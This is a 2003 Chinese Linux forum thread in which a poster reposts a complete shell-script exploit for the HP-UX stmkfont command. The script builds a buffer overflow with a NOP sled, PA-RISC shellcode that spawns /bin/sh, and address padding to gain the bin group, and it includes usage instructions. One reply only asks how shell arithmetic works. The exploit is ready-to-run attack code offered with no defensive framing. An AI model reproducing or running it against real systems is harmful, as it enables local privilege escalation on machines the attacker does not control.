LinuxSir.cn,穿越时空的Linuxsir!

 找回密码
 注册
搜索
热搜: shell linux mysql
查看: 1066|回复: 2

一个攻击性脚本

[复制链接]
发表于 2003-3-6 14:03:13 | 显示全部楼层 |阅读模式
  1. #!/bin/sh
  2. #   File : ex_stmkfont.sh
  3. #   Exploit for command stmkfont of HPUX to get bin gid BUFF.
  4. # * Usage: chmod +x ex_stmkfont.sh ; ./ex_stmkfont.sh
  5. #   Write by [email]watercloud@xfocus.org[/email]       2003-2-20
  6. #   Site : [url]www.xfocus.org[/url]   [url]www.xfocus.net[/url]
  7. NOP_LEN=65
  8. ADDR_LEN=5000
  9. BUFF="";i=0
  10. while [ $i -ne $NOP_LEN ] ; do
  11.   BUFF=$BUFF'\0013\0071\0002\0231'  ; i=$(($i+1))
  12. done
  13. BUFF=$BUFF'\0013\0071\0002\0127\0052\0344\0227\0020\0050\0073\0160\0357\0010\0067\0002\0103'
  14. BUFF=$BUFF'\0266\0372\0100\0004\0266\0371\0100\0004\0266\0370\0100\0004\0344\0140\0340\0010'
  15. BUFF=$BUFF'\0266\0366\0100\0376\0013\0071\0002\0231\0053\0044\0227\0020\0050\0073\0160\0357'
  16. BUFF=$BUFF'\0353\0137\0037\0375\0013\0071\0002\0231\0267\0132\0100\0042\0017\0100\0022\0016'
  17. BUFF=$BUFF'\0010\0071\0002\0103\0344\0140\0340\0010\0264\0026\0160\0026/bin/shX'
  18. i=0;
  19. while [ $i -ne $ADDR_LEN ] ; do
  20.   BUFF=$BUFF'\0177\0177\0001\0020'; i=$(($i+1))
  21. done
  22. STR=`/bin/echo "${BUFF}"`
  23. /usr/bin/stmkfont -d1 x -d2 $STR x
  24. #EOF
复制代码
----来自:
www.xfocus.net
发表于 2003-3-6 16:26:47 | 显示全部楼层
i=$(($i+1))怎么理解


  1. [ma@mm2 ma]$ i=1111
  2. [ma@mm2 ma]$ i=$(($i+1))
  3. [ma@mm2 ma]$ echo $i
  4. 1112
  5. [ma@mm2 ma]$

复制代码
 楼主| 发表于 2003-3-6 16:35:53 | 显示全部楼层
这是我从安全焦点www.xfocus.net/ 上CP过来让大家看的.
类别: 攻击程序
平台: UNIX
简介: HPUX (PA) stmkfont命令溢出利用程序。Tested on HPUX B11.11。
也许不适合linux平台(版本多)
您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表